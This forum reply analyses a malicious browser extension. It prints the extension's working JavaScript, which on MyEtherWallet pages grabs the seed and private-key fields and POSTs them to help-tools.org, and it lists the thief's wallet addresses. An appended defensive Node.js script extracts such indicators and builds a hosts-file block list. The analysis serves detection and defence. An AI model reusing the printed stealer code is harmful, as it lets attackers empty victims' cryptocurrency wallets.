Board: Development & Technical Discussion
Merits: 34 from 9 users
Re: We need some help to decode a hacker addon
by nuno12345 on 13/12/2018, 08:52:22 UTC
⭐ Merited by theymos_away (20) ,seoincorporation (3) ,LoyceV (3) ,DdmrDdmr (2) ,marlboroza (2) ,ETFbitcoin (1) ,Bitcoinnation (1) ,Piggy (1) ,vapourminer (1)
Had a quick look.

How the extension works is by filtering on the listed domains, grabbing information such as the seed and sending it to https://help-tools.org/courses/currentc.php

MyEtherWallet:
Code:
// Only arm the hooks on pages whose URL contains "myetherwallet".
if (location.href.indexOf('myetherwallet') > -1) {
    function kurilkaNJSmo() {
        // Hook 1: on Enter (keyCode 13) read the two form fields and POST them out.
        document.onkeyup = function(e) {
            e = e || window.event;
            if (e.keyCode === 13) {
                var seeddas = $("#aria4").val();   // variable name suggests the seed field
                var pkk = $("#aria6").val();       // variable name suggests the private key field
                var myseedwal = seeddas + ' + ' + pkk;
                $.ajax({
                    type: 'POST',
                    url: 'https://help-tools.org/courses/currentc.php',
                    crossDomain: !0,               // !0 === true
                    data: {
                        // body is "none:myetherwallet:<seed> + <key>"
                        meww: "none" + ":" + "myetherwallet" + ":" + myseedwal
                    },
                    dataType: 'html',
                })
            }
            return !1                              // !1 === false
        }
        // Hook 2: same exfiltration when the page's primary (Angular) button is clicked.
        document.body.addEventListener("click", function(event) {
            if (event.toElement.className == "btn btn-primary ng-scope") {
                console.log("go");
                var seeddas = $("#aria4").val();
                var pkk = $("#aria6").val();
                var myseedwal = seeddas + ' + ' + pkk;
                $.ajax({
                    type: 'POST',
                    url: 'https://help-tools.org/courses/currentc.php',
                    crossDomain: !0,
                    data: {
                        meww: "none" + ":" + "myetherwallet" + ":" + myseedwal
                    },
                    dataType: 'html',
                })
            }
        })
    }
    // Wait two seconds so the wallet page has rendered its form before hooking it.
    setTimeout(kurilkaNJSmo, 2000)
}


That domain was clearly hacked.
The expected format is something like none:myetherwallet:key

When sending a GET request some currency tickers are returned.

Sending a POST request, the response sends the same data but with either a "+" or "-" as the very first character of the page, depending on whether the format is valid or not?

By removing some of the parameters "invalid" is returned.

Best bet would be to block the domain, but if the user is smart enough to block a domain, they will be smart enough not to download the extension in the first place, I would assume.


EDIT:
Addresses of the thief:
Code:
CypherMcDAG.BTC = '16EegrNMdZ9Rxku6Za5neEFjMW57wkQr1S';
CypherMcDAG.ETH = '0x03b70dc31abf9cf6c1cf80bfeeb322e8d3dbb4ca';
CypherMcDAG.ETC = '0x4F53C9882Ba87d2D7c525dF2aEF2540EFB6e32e5';
CypherMcDAG.BCH = '1PCh7w6LdcEv1sWd5wtvkELHcWe5HumUi3';
CypherMcDAG.LTC = 'LRPChoyN8qLWENjo1dUjk2bESZjE7bQ6sP';

Some comments:
//tut kodpzds - Google Translate autodetects Russian? Ofc..
//bikbuk = bikbuk*0.01;

Some urls:
https://help-tools.org/courses/plsnoban.php
https://help-tools.org/md5.php
https://help-tools.org/courses/status.php?s=c
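Added example (not code from the original post or from the extension's author): a Node.js triage script that pulls the indicators this post identifies out of an extension's source without running it, then turns the exfiltration hosts into hosts-file lines for the domain block the post suggests. It looks for the `location.href.indexOf(...)` target filter, the jQuery `.val()` form reads, the method and URL of each `$.ajax({...})` call, and quoted literals shaped like BTC/BCH, LTC or ETH addresses. The embedded sample is a constructed, cut-down copy of the snippet quoted above. The matching is heuristic: address detection is shape-only (no checksum), and the balanced-bracket scanner assumes no brackets inside string literals.

```javascript
// Static triage of a suspicious extension script: extract indicators without
// executing the code. Added example, not part of the original post.
// Usage: node triage.js

// Constructed sample: a cut-down copy of the snippet quoted in the post.
const SAMPLE_EXTENSION_SOURCE = `
if (location.href.indexOf('myetherwallet') > -1) {
    document.onkeyup = function(e) {
        if (e.keyCode === 13) {
            var seeddas = $("#aria4").val();
            var pkk = $("#aria6").val();
            $.ajax({
                type: 'POST',
                url: 'https://help-tools.org/courses/currentc.php',
                crossDomain: !0,
                data: { meww: "none" + ":" + "myetherwallet" + ":" + seeddas + ' + ' + pkk },
                dataType: 'html',
            });
        }
    };
}
CypherMcDAG.BTC = '16EegrNMdZ9Rxku6Za5neEFjMW57wkQr1S';
CypherMcDAG.ETH = '0x03b70dc31abf9cf6c1cf80bfeeb322e8d3dbb4ca';
CypherMcDAG.LTC = 'LRPChoyN8qLWENjo1dUjk2bESZjE7bQ6sP';
`;

// Return the text between the '(' at openIdx and its matching ')'.
// Counts (), {} and [] only; it does not understand string literals, which is
// good enough for hand-written loader code like the sample (assumption).
function callArgs(src, openIdx) {
  let depth = 0;
  for (let i = openIdx; i < src.length; i++) {
    const c = src[i];
    if (c === '(' || c === '{' || c === '[') depth++;
    else if (c === ')' || c === '}' || c === ']') {
      depth--;
      if (depth === 0) return src.slice(openIdx + 1, i);
    }
  }
  return src.slice(openIdx + 1);
}

function extractIndicators(src) {
  const unique = (xs) => [...new Set(xs)];
  const all = (re) => [...src.matchAll(re)].map((m) => m[1]);

  // 1. URL filters: which sites the script waits for before doing anything.
  const targetFilters = unique(all(/location\.href\.indexOf\(\s*['"]([^'"]+)['"]\s*\)/g));

  // 2. Form reads: jQuery selectors whose .val() is taken (seed / key fields).
  const formReads = unique(all(/\$\(\s*['"]([^'"]+)['"]\s*\)\s*\.val\(\)/g));

  // 3. Outbound requests: method and URL of each $.ajax({...}) call.
  const exfil = [];
  const ajaxRe = /\$\.ajax\s*\(/g;
  let m;
  while ((m = ajaxRe.exec(src)) !== null) {
    const args = callArgs(src, m.index + m[0].length - 1);
    const url = /url\s*:\s*['"]([^'"]+)['"]/.exec(args);
    const type = /type\s*:\s*['"]([^'"]+)['"]/.exec(args);
    if (url) exfil.push({ method: type ? type[1].toUpperCase() : 'GET', url: url[1] });
  }

  // 4. Hard-coded addresses: quoted literals shaped like ETH (0x + 40 hex),
  //    legacy BTC/BCH base58 (leading 1 or 3) or LTC base58 (leading L).
  //    Shape-only check, no checksum validation, so treat hits as leads.
  const addrRe = /['"](0x[0-9a-fA-F]{40}|[13][a-km-zA-HJ-NP-Z1-9]{25,34}|L[a-km-zA-HJ-NP-Z1-9]{26,33})['"]/g;
  const addresses = unique(all(addrRe)).map((a) => ({
    chain: a.startsWith('0x') ? 'ETH-style' : a.startsWith('L') ? 'LTC' : 'BTC/BCH-legacy',
    address: a,
  }));

  return { targetFilters, formReads, exfil, addresses };
}

// Turn the exfil URLs into hosts-file lines: the cheapest block the post suggests.
function hostsBlocklist(indicators) {
  const hosts = new Set();
  for (const e of indicators.exfil) {
    try { hosts.add(new URL(e.url).hostname); } catch (_) { /* relative or malformed URL: skip */ }
  }
  return [...hosts].sort().map((h) => `0.0.0.0 ${h}`);
}

if (typeof require !== 'undefined' && require.main === module) {
  const report = extractIndicators(SAMPLE_EXTENSION_SOURCE);
  console.log(JSON.stringify(report, null, 2));
  console.log(hostsBlocklist(report).join('\n'));
}
```

Run it against the extension's unpacked background and content scripts rather than the sample; anything that reads `.val()` on a wallet page and hands it to a cross-origin `$.ajax` POST is what this post found, and the ETC and BCH addresses listed above will show up as further `ETH-style` and `BTC/BCH-legacy` hits.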